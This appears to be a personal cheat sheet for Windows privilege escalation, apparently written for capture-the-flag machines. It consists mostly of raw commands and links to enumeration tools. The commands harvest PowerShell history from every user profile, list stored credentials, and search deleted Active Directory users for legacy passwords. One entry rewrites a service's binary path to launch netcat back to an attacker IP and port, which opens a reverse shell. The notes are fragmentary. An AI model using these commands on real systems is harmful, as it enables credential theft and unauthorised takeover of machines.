https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology and Resources/Windows - Privilege Escalation.md

icacls root.txt /grant alfred:F

powershell -c "tnc 10.10.14.33 -Port 135” (ping)

where /R c:\ bash.exe

dir /q /a /s

• Winpeas( runs within ‣.exe, .net >4)
• https://github.com/411Hall/JAWS

‣.exe

• https://github.com/itm4n/PrivescCheck

Config-based privesc checks

• PowerUp.ps1

https://github.com/GhostPack/SharpUp.exe

Patch-level / missing KB exploits

• https://github.com/bitsadmin/wesng
• ‣.ps1

dir -force #always

whoami /all

for %i in (Documents Downloads Pictures Contacts Desktop Favorites) do @dir /s "C:\\Users\\%USERNAME%\\%i"

Check C:\\ & C:\\Program files & Public as well

Import-Module PSReadLine
gc (Get-PSReadLineOption).HistorySavePath; type $Env:UserProfile\\AppData\\Roaming\\Microsoft\\Windows\\PowerShell\\PSReadline\\ConsoleHost_history.txt; foreach($user in ((ls C:\\users).fullname)){cat "$user\\AppData\\Roaming\\Microsoft\\Windows\\PowerShell\\PSReadline\\ConsoleHost_history.txt" -ErrorAction SilentlyContinue}
# Enumerate PSReadLine history across all profiles (silently skip missing)
foreach($user in ((ls C:\\users).fullname)){cat "$user\\AppData\\Roaming\\Microsoft\\Windows\\PowerShell\\PSReadline\\ConsoleHost_history.txt" -ErrorAction SilentlyContinue}

#checking deleted users for cascadelegacypwd
Import-Module ActiveDirectory
Get-ADObject -Filter 'isDeleted -eq $true -and objectClass -eq "user"' `
  -IncludeDeletedObjects -Properties * |
  Format-List *

• cmdkey /list (administrator)
• Privileges (whoami /all) ‣

netstat -ano | findstr “TCP”

ipconfig

arp -a

if u can edit a service binary path ( sc qc [service]) (sc config [service] nc ip port) (sc stop [serv]) (sc start [serv])

• softwares
• Passwords & creds
• printnightmare
• WSL
• LAPS